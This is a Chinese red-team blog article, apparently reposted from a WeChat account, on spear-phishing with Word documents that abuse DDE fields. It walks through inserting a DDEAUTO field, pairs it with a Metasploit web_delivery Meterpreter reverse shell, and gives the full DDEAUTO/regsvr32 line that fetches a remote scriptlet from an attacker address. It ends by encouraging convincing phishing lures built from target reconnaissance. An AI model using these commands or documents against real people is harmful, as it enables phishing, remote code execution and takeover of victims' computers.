鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

  • A+
所属分类:安全文章

渗透攻击红队

一个专注于红队攻击的公众号

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击


大家好,这里是 渗透攻击红队 的第 54 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新


鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
DDE


DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。


通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。


在MSWord和MSExcel里,我们可以使用DDE来执行命令。


DDE 攻击演示

DDE 攻击打开 calc


首先通过 word 文档设置一个域代码:crlt+f9,或者选中“插入”-“文件部件”-“”,选中第一个 = (Formula) 然后右键切换域代码来编辑代码,插入下面的内容:

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

然后再里面输入测试代码:

DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

保存后重新打开 word 文档:

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

点击两次“是”就会调用 DDE 执行 calc.exe:

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击


Metasploit + DDE = Meterpreter


那如果是要反弹 shell 的话需要借助 MSF 来帮助我们:

msf > use exploit/multi/script/web_deliverymsf > set target 3msf > set payload windows/meterpreter/reverse_tcp_uuid msf > set lhost 192.168.201.237msf > set lport 8081msf exploit(multi/script/web_delivery) > exploit -j [*] Exploit running as background job 0.

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

得到的反弹代码是:

regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll

然后我们在 DDE 里插入代码(注意引号):

DDEAUTO c:\windows\system32\cmd.exe "/k regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll"

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

最后保存再打开 word 文档即可反弹 shell 到 msf :

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击


结尾


DDE 攻击比较老了,不过在渗透中难免还是会碰到;关于 DDE 攻击的缺点就在于目标必须要点击两次“是”才能够执行 DDE 代码进行攻击,而至于怎样才能让目标心甘情愿的点击,那就靠各位如何包装钓鱼邮件,和如何实施了,一份逼真的钓鱼鱼饵在于你搜集到目标的信息是否准确真实,在此不多解释大家都懂。


鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

渗透攻击红队

一个专注于渗透红队攻击的公众号

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击



鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
点分享
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
点点赞
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
点在看

本文始发于微信公众号(渗透攻击红队):鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: